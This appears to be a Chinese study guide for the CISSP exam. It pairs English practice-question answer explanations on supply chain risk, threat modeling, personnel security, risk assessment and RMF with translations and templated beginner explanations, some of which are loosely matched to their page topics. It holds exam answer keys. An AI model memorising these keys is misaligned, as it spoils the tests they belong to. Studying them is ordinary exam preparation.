看似合理并执行了所有必要功能,但这并不能保证其安全性,也不能 保证在供应链中未被篡改。 15. D. 尽管未明确提及硬件,但此情景描述了供应链中一种典型且潜在的风险: 硬件风险可能导致最终产品中存在监听机制。 此情景未提供任何信息表明供应 链风险聚焦于软件、服务或数据。 16. B. 在此情景中,Cathy 应撤销该供应商的运行授权(ATO)。 这种情况 表明该供应商未满足保护服务及其客户所必需的最低安全要求。 撰写报告不足 以应对这一发现。 你可能假设 Cathy 拥有或不拥有执行其他选项的权限,但 没有任何信息表明 Cathy 在组织中的职位。 由首席执行官要求首席信息安全 官(CISO)进行此类评估是合理的。 无论如何,报告应提交给 CISO,而非 CIO,因为 CIO 的主要关注点是确保信息有效用于实现业务目标,而非确保 这种使用是安全的。 审查条款和条件在此情景中不会产生任何影响,因为这些 条款通常适用于客户,而非内部运营。 审查本身并不必然导致对不安全实践的 改变或改进。 供应商签署的保密协议(NDA)与此情景无关。 17. A. 最低安全要求应基于您现有的安全策略进行建模。

这一理念源于:与第 三方合作时,该第三方应至少具备与您组织相同的安保水平。 第三方审计是指 引入第三方审计员对实体的安全基础设施进行无偏见的审查。 此类审计可能揭 示存在的问题,但不应作为确立第三方最低安全要求的依据。 现场评估是指您 前往该组织的场所,与人员面谈并观察其操作习惯。 这同样不是确立第三方最 低安全要求的依据。 漏洞扫描结果与第三方审计类似,可能揭示潜在问题, 但它也不是确立第三方最低安全要求的依据。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

运行授权 ATO:ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

政府/军方场景看到 ATO,要关注文档、合规和现场审查。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
运行授权 ATO ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 72 / PDF P1466

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

18. C. Process for Attack Simulation and Threat Analysis (PASTA) is a sevenstage threat modeling methodology. PASTA is a risk-centric approach that aims at selecting or developing countermeasures in relation to the value of the assets to be protected. Visual, Agile, and Simple Threat (VAST) is a threat modeling concept that integrates threat and risk management into an Agile programming environment on a scalable basis. DREAD (Damage, Reproducibility, Exploitability, Affected Users, and Discoverability) is a flexible threat rating system that is based on the answers to five main questions about a threat. STRIDE is a threat categorization scheme developed by Microsoft. 19. B, C, E, F, G.

The five key concepts of decomposition are trust boundaries, dataflow paths, input points, privileged operations, and details about security stance and approach. Patch or update version management is an important part of security management in general; it is just not a specific component of decomposition. Determining openversus closed-source code use is not an element of decomposition. 20. A, B, C, D, E, F, G, H, I. All of the listed options are terms that relate to or are based on defense in depth: layering, classifications, zones, realms, compartments, silos, segmentations, lattice structure, and protection rings. 18. C.

中文直译 / 整理

攻击模拟与威胁分析流程(PASTA)是一种七阶段威胁建模方法。 PASTA 是一种以风险为中心的方法,旨在根据待保护资产的价值选择或开发 对策。 视觉化、敏捷且简单的威胁(VAST)是一种威胁建模概念,可将威胁 与风险管理以可扩展的方式集成到敏捷编程环境中。 DREAD(损害、可重现 性、可利用性、受影响用户数和可发现性)是一种基于对威胁五个主要问题的 回答的灵活威胁评级系统。 STRIDE 是微软开发的一种威胁分类方案。 19. B、C、E、F、G。 分解的五个关键概念是信任边界、数据流路径、输入 点、特权操作以及安全立场与方法的详细信息。 补丁或版本更新管理是整体 安全管理的重要组成部分,但它并非分解的特定组成部分。 确定使用开源还 是闭源代码不是分解的要素。 20. A、B、C、D、E、F、G、H、I。 所有列出的选项都是与纵深防御相关的 术语:分层、分类、区域、领域、隔间、孤岛、分段、晶格结构和保护环。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

纵深防御:纵深防御不是一道门,而是一层又一层控制。

分层:分层把控制按层排列,让攻击者必须连续突破。

威胁建模:威胁建模是在设计和生命周期中提前识别威胁。

STRIDE:STRIDE 用六类威胁检查系统:伪装、篡改、抵赖、信息泄露、拒绝服务、提权。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

多层控制串联、避免单点失败,就是 defense in depth。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

越早做威胁建模,修复成本越低。

STRIDE 是威胁分类模型。

DREAD 是风险评分方法,不是威胁类别。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
纵深防御 纵深防御不是一道门,而是一层又一层控制。
分层 分层把控制按层排列,让攻击者必须连续突破。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
STRIDE STRIDE 用六类威胁检查系统:伪装、篡改、抵赖、信息泄露、拒绝服务、提权。
DREAD DREAD 用五个维度给威胁打分。
PASTA PASTA 是七阶段、风险中心的威胁建模方法。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 73 / PDF P1467

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Chapter 2: Personnel Security and Risk Management Concepts 1. D. Regardless of the specifics of a security solution, humans are often considered the weakest element. No matter what physical or logical controls are deployed, humans can discover ways to avoid them, circumvent or subvert them, or disable them. Thus, it is important to take into account the humanity of your users when designing and deploying security solutions for your environment. Software products, internet connections, and security policies can all be vulnerabilities or otherwise areas of security concern, but they are not considered the most common weakest element of an organization. 2. A.

The first step in hiring new employees is to create a job description. Without a job description, there is no consensus on what type of individual needs to be found and hired. Crafting job descriptions is the first step in defining security needs related to personnel and being able to seek out new hires. From the job description, a determination can be made as to the education, skills, experience, and classification required by the applicant. Then a job posting can be made to request the submission of résumés. Then, candidates can be screened to see if they meet the requirements and if they have any disqualifications. 3. B.

Onboarding is the process of adding new employees to the organization, having them review and sign policies, be introduced to managers and coworkers, and be trained in employee operations and logistics. Reissue is a certification function when a lost certificate is provided to the user by extracting it from the escrow backup database or when a certificate is altered to extend its expiration date. Background checks are used to verify that a job applicant is qualified but not disqualified for a specific work position. A site survey is used to optimize the placement of wireless access points (WAPs) to provide reliable connectivity throughout the organization's facilities. 4. B.

A termination process often focuses on eliminating an employee who has become problematic, whether that employee is committing crimes or just violating company policy. Once the worker is fired, the company has little direct control over that person. So, the only remaining leverage is legal, which often relates to a nondisclosure agreement (NDA). Hopefully, reviewing and reminding the former employee about their

中文直译 / 整理

第2章:人员安全与风险管理概念 1. D. 无论安全解决方案的具体细节如何,人类通常被视为最薄弱的环节。 无 论部署了何种物理或逻辑控制措施,人类总能找到规避、绕过、破坏或禁用 这些措施的方法。 因此,在为您的环境设计和部署安全解决方案时,必须考 虑用户的人性。 软件产品、互联网连接和安全策略都可能是漏洞或其他安全 问题领域,但它们不被视为组织中最常见的薄弱环节。 2. A. 雇佣新员工的第一步是制定职位描述。 如果没有职位描述,就无法就需 要寻找和雇佣什么样的人员达成共识。 制定职位描述是明确与人员相关的安 全需求并能够寻找新员工的第一步。 根据职位描述,可以确定申请人所需的 教育背景、技能、经验和类别。 然后发布职位公告,请求提交简历。 接着, 对候选人进行筛选,以确认他们是否符合要求以及是否存在任何不合格因素。 3. B. 入职是将新员工添加到组织中的过程,包括让他们审阅并签署政策、认 识经理和同事,并接受员工操作和后勤方面的培训。 重新签发是一种认证功 能,当从托管备份数据库中提取证书提供给用户,或当证书被修改以延长其 有效期时使用。 背景调查用于核实求职者是否具备特定职位的任职资格,但 未被取消资格。

现场勘查用于优化无线接入点(WAP)的布局,以确保组织 设施内提供可靠的连接性。 4. B. 解雇流程通常侧重于清除那些已变得有问题的员工,无论他们是犯了罪 还是仅仅违反了公司政策。 一旦员工被解雇,公司对该人员的直接控制权就 很小了。 因此,唯一剩下的杠杆是法律手段,通常涉及保密协议(NDA)。 希望在员工离职后,通过回顾和提醒他们

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

政策:政策是高层原则,说明必须遵守什么。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Policy 高层、强制、稳定;Procedure 具体步骤。

证书不是密钥本身,而是身份与公钥的可信绑定。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
政策 政策是高层原则,说明必须遵守什么。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 74 / PDF P1468

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

signed NDA will reduce future security issues, such as confidential data dissemination. Returning the exiting employee's personal belongings is not really an important task to protect the company's security interests. Evaluating the exiting employee's performance could be done via an exit interview, but that was not mentioned in this scenario. Often when an adversarial termination occurs, an exit interview is not feasible. Canceling an exiting employee's parking permit is not a high security priority for most organizations, at least not in comparison to the NDA. 5. C. Option C is correct: Multiparty risk exists when several entities or organizations are involved in a project.

The risk or threats are often due to the variations of objectives, expectations, timelines, budgets, and security priorities of those involved. The other statements are false. Their corrected and thus true versions would be: (A) using servicelevel agreements (SLAs) is a means to ensure that organizations providing services maintain an appropriate level of service agreed on by the service provider, vendor, or contractor and the customer organization; (B) outsourcing can be used as a risk response option known as transference or assignment; and (D) risk management strategies implemented by one party may in fact cause additional risks to or from another party. 6. A.

An asset is anything used in a business process or task. A threat is any potential occurrence that may cause an undesirable or unwanted outcome for an organization or for a specific asset. A vulnerability is the weakness in an asset, or the absence or the weakness of a safeguard or countermeasure. An exposure is being susceptible to asset loss because of a threat; there is the possibility that a vulnerability can or will be exploited. Risk is the possibility or likelihood that a threat will exploit a vulnerability to cause harm to an asset and the severity of damage that could result. 7. B.

The threat of a fire and the vulnerability of a lack of fire extinguishers lead to the risk of damage to equipment. This scenario does not relate to virus infection or unauthorized access. Equipment damaged by fire could be considered a system malfunction, but that option is not as direct as “damage to equipment.” 8. D. This scenario is describing the activity of performing a quantitative risk assessment. The question describes the determination of asset value (AV) as well as the exposure factor (EF) and the annualized rate of occurrence (ARO) for each identified threat. These are the needed values

中文直译 / 整理

签署NDA将减少未来安全问题,例如机密数据泄露。 归还离职员工的个 人物品并不是保护公司安全利益的重要任务。 评估离职员工的表现可以通 过离职面谈完成,但本情景中并未提及这一点。 通常在发生对抗性终止时, 离职面谈是不可行的。 取消离职员工的停车许可证对大多数组织来说并不是高优先级的安全事项, 至少与保密协议相比是如此。 5. C. 选项C正确:当多个实体或组织参与一个项目时,存在多方风险。 这些 风险或威胁通常源于相关各方目标、期望、时间表、预算和安全优先级的差 异。 其他陈述均为错误。 其修正后的正确版本应为:(A)使用服务水平协议 (SLAs)是确保提供服务的组织维持服务提供商、供应商或承包商与客户组 织商定的适当服务水平的一种手段; (B)外包可作为一种风险应对策略,称 为转移或分配; (D)一方实施的风险管理策略实际上可能对另一方造成额外 的风险。 6. A. 资产是用于业务流程或任务的任何事物。 威胁是可能导致组织或特定 资产产生不良或不希望后果的任何潜在事件。 脆弱性是资产中的弱点,或防 护措施或应对措施的缺失或不足。 暴露是指因威胁而可能导致资产损失的易 感状态; 存在脆弱性可能或将会被利用的可能性。

风险是指威胁利用脆弱性 对资产造成损害的可能性或概率,以及可能造成的损害严重程度。 7. B. 火灾的威胁与缺乏灭火器的脆弱性导致设备受损的风险。 此情景与病毒 感染或未经授权的访问无关。 被火灾损坏的设备可视为系统故障,但该选项 不如“设备损坏”直接。 8. D. 此情景描述的是执行定量风险评估的活动。 问题中描述了确定资产价值 (AV)、每个已识别威胁的暴露因子(EF)和年发生率(ARO)。 这些是 所需值。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 75 / PDF P1469

第 1469 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

to calculate the annualized loss expectancy (ALE), which is a quantitative factor. This is not an example of a qualitative risk assessment, since specific numbers are being determined rather than relying on ideas, reactions, feelings, and perspectives. This is not the Delphi technique, which is a qualitative risk assessment method that seeks to reach an anonymous consensus. This is not risk avoidance, since that is an optional risk response or treatment, and this scenario is only describing the process of risk assessment. 9. C. The annual costs of safeguards should not exceed the expected annual cost of asset value loss. The other statements are not rules to follow.

(A) The annual cost of the safeguard should not exceed the annual cost of the asset value or its potential value loss. (B) The cost of the safeguard should be less than the value of the asset. (D) There is no specific maximum percentage of a security budget for the cost of a safeguard. However, the security budget should be used efficiently to reduce overall risk to an acceptable level. 10. C. When controls are not cost effective, they are not worth implementing. Thus, risk acceptance is the risk response in this situation. Mitigation is the application of a control; that was not done in this scenario.

Ignoring risk occurs when no action, not even assessment or control evaluation, is performed in relation to a risk. Since controls were evaluated in this scenario, this is not ignoring risk. Assignment is the transfer of risk to a third party; that was not done in this scenario. 11. A. The value of a safeguard to an organization is calculated by ALE before safeguard – ALE after implementing the safeguard – annual cost of safeguard [(ALE1 – ALE2) – ACS]. This is known as the cost/benefit equation for safeguards. The other options are incorrect. (B) This is an invalid calculation. (C) This is an invalid calculation.

(D) This is the concept formula for residual risk: total risk – controls gap = residual risk. 12. A, C. Statements of A and C are valid definitions of risk. The other two statements are not definitions of risk. (B) Anything that removes a vulnerability or protects against one or more specific threats is considered a safeguard or a countermeasure, not a risk. (D) The presence of a vulnerability when a related threat exists is an exposure, not a risk. A risk is a calculation of the probability of occurrence and the level of damage that could be caused if an exposure is realized (i.e., actually occurs).

中文直译 / 整理

为了计算年化损失预期(ALE),这是一个定量因素。 这不属于定性风险 评估的示例,因为这里确定的是具体数值,而非依赖于想法、反应、感受 和观点。 这也不是德尔菲法,因为德尔菲法是一种寻求匿名共识的定性风 险评估方法。 这也不是风险规避,因为风险规避是一种可选的风险应对或 处理措施,而本场景仅描述了风险评估的过程。 9. C. 安全措施的年度成本不应超过资产价值损失的预期年度成本。 其他陈述 均非需遵循的规则。 (A)安全措施的成本不应超过资产价值或其潜在价值 损失的年度成本。 (B)安全措施的成本应低于资产的价值。 (D)对于安全 措施的成本,安全预算中没有特定的最大百分比限制。 然而,安全预算应被 高效使用,以将整体风险降低至可接受水平。 10. C. 当控制措施不具备成本效益时,就不值得实施。 因此,在这种情况下, 风险接受是应对风险的措施。 风险缓解是应用控制措施; 但在此场景中并未 这样做。 忽略风险是指对风险不采取任何行动,甚至不进行评估或控制评价; 而本场景中已对控制措施进行了评估,因此不属于忽略风险。 转移风险是将 风险转移给第三方; 但本场景中并未这样做。

11. A. 安全措施对组织的价值通过以下公式计算:实施安全措施前的ALE – 实 施安全措施后的ALE – 安全措施的年度成本 [(ALE1 – ALE2) – ACS]。 这被称 为安全措施的成本/收益公式。 其他选项均不正确。 (B)这是一个无效的计 算。 (C)这是一个无效的计算。 (D)这是残余风险的概念公式:总风险 – 控制差距 = 残余风险。 12. A、C。 A和C的陈述是对风险的有效定义。 另外两个陈述不是对风险的定 义。 (B)任何消除脆弱性或保护免受一个或多个特定威胁影响的事物都被视 为安全措施或对策,而不是风险。 (D)当存在相关威胁时,脆弱性的存在称 为暴露,而非风险。 风险是对暴露发生概率及其可能造成损害程度的计算(即 实际发生时)。

小白解释

场景先行:你是公司的安全负责人,正在读第 1469 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1469 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 76 / PDF P1470

安全职能与业务战略对齐

安全目标要服务业务目标,并受预算和资源限制。

教材原文段落

13. A. This situation is describing inherent risk. Inherent risk is the level of natural, native, or default risk that exists in an environment, system, or product prior to any risk management efforts being performed. The new application had vulnerabilities that were not mitigated, thus enabling the opportunity for the attack. This is not a risk matrix. A risk matrix or risk heat map is a form of risk assessment that is performed on a basic graph or chart, such as a 3×3 grid comparing probability and damage potential. This is not a qualitative risk assessment, since this scenario does not describe any evaluation of the risk of the new code.

This is not residual risk, since no controls were implemented to reduce risk. Residual risk is the leftover risk after countermeasures and safeguards are implemented in response to original or total risk. 14. C. The level of RMM named Defined requires that a common or standardized risk framework be adopted organization-wide. This is effectively level 3. The first level of RMM is not listed as an option; it is ad hoc, which is the chaotic starting point. Preliminary is RMM level 2, which demonstrates loose attempts to follow risk management processes, but each department may perform risk assessment uniquely.

Integrated is RMM level 4, where risk management operations are integrated into business processes, metrics are used to gather effectiveness data, and risk is considered an element in business strategy decisions. Optimized is RMM level 5, where risk management focuses on achieving objectives rather than just reacting to external threats, increasing strategic planning toward business success rather than just avoiding incidents, and reintegrating lessons learned into the risk management process. 15. B.

The RMF phase 6 is Authorize the system or common controls based on a determination that the risk to organizational operations and assets, individuals, other organizations, and the Nation is acceptable. The phases of RMF are (1) Prepare, (2) Categorize, (3) Select, (4) Implement, (5) Assess, (6) Authorize, and (7) Monitor. (A) RMF phase (2) is categorize the system and the information processed, stored, and transmitted by the system based on an analysis of the impact of loss.

(C) RMF phase (5) is assess the controls to determine if the controls are implemented correctly, operating as intended, and producing the desired outcomes with respect to satisfying the security and privacy requirements. (D) RMF phase (7) is monitor the system and the associated controls on an ongoing basis to include assessing control effectiveness, documenting 13. A.

中文直译 / 整理

此情况描述的是固有风险。 固有风险是指在任何风险管理措施实施之前, 环境中、系统中或产品中存在的自然、原生或默认风险水平。 新应用程序存在 未被缓解的漏洞,从而为攻击创造了机会。 这不是风险矩阵。 风险矩阵或风险 热力图是一种基于基本图表(如3×3 网格,比较发生概率和损害潜力)进行的 风险评估形式。 这不是定性风险评估,因为本场景未描述对新代码风险的任何 评估。 这不是残余风险,因为未实施任何控制措施来降低风险。 残余风险是指 在针对原始或总体风险实施应对措施和防护手段后剩余的风险。 14. C. 被称为‘已定义’级别的RMM要求在整个组织内采用通用或标准化的 风险框架。 这实际上相当于第3级。 RMM的第1级未作为选项列出; 它是临时 性的,是混乱的起点。 ‘初步’是RMM第2级,表明对风险管理流程的松散 尝试,但每个部门可能独立执行风险评估。 ‘集成’是RMM第4级,其中风 险管理操作已融入业务流程,使用指标收集有效性数据,并将风险视为业务战 略决策的一个要素。

‘优化’是RMM第5级,其中风险管理侧重于实现目标, 而不仅仅是应对外部威胁,加强面向业务成功的战略规划,而不仅仅是避免事 件,并将经验教训重新整合到风险管理流程中。 15. B. RMF 第6阶段是基于对组织运营和资产、个人、其他组织以及国家所面 临风险可接受的判断,对系统或通用控制措施进行授权。 RMF的阶段包括: (1) 准备,(2) 分类,(3) 选择,(4) 实施,(5) 评估,(6) 授权,和 (7) 监控。 (A) RMF 第(2)阶段是根据损失影响分析,对系统及系统处理、存储和传输的 信息进行分类。 (C) RMF 第(5)阶段是评估控制措施,以确定控制措施是否正 确实施、按预期运行,并产生满足安全和隐私要求的预期结果。 (D) RMF 第 (7)阶段是持续监控系统及相关控制措施,包括评估控制有效性、记录

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:安全目标要服务业务目标,并受预算和资源限制。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

授权:授权是认证之后决定你能访问什么、能做什么。

业务战略对齐:安全要支持组织使命和目标,而不是单独追求技术完美。

战略计划:战略计划是长期、稳定、方向性的安全计划。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全职能与业务战略对齐”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

认证成功不等于什么都能做;权限仍要单独授权。

安全目标要与业务目标、预算、资源约束对齐。

Strategic 长期,Tactical 中期,Operational 短期日常。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
授权 授权是认证之后决定你能访问什么、能做什么。
业务战略对齐 安全要支持组织使命和目标,而不是单独追求技术完美。
战略计划 战略计划是长期、稳定、方向性的安全计划。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 77 / PDF P1471

第 1471 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

changes to the system and environment of operation, conducting risk assessments and impact analyses, and reporting the security and privacy posture of the system. 16. B, F. The leaking of company proprietary data may have been caused by the content of emails received by workers. The computers of workers who clicked links from the suspicious emails may have been infected by malicious code. This malicious code may have exfiltrated documents to the social media site.

This issue could occur whether workers were on company computers on the company network, on company computers on their home network, or on personal computers on their home network (especially if the workers copied company files to their personal machines to work from home). Blocking access to social media sites and personal email services from the company network reduces the risk of this same event occurring again. For example, if the suspicious emails are blocked from being received by company email servers and accounts, they could still be received into personal email accounts. Though not mentioned, blocking access to the malicious URLs would be a good security defense as well.

This issue is not addressed by deploying a web application firewall, updating the company email server, using MFA on the email server, or performing an access review of company files. Although all of these options are good security practices in general, they do not relate specifically to this issue. 17. C. Training is teaching employees to perform their work tasks and to comply with the security policy. Training is typically hosted by an organization and is targeted to groups of employees with similar job functions. (A) Education is an endeavor in which students and users learn much more than they actually need to know to perform their work tasks.

Education is most often associated with users pursuing certification or seeking job promotion or career advancement. Most education programs are not hosted by the employer but by training organizations or colleges or universities. Education is not provided to workers in groups based on their job positions. (B) Awareness establishes a common baseline or foundation of security understanding across the entire organization and focuses on key or basic topics and issues related to security that all employees must understand. Although it is provided by the organization, it is not targeted to groups of workers since it applies to all employees.

(D) Termination is usually targeted at individuals rather than groups of workers with similar job positions.

中文直译 / 整理

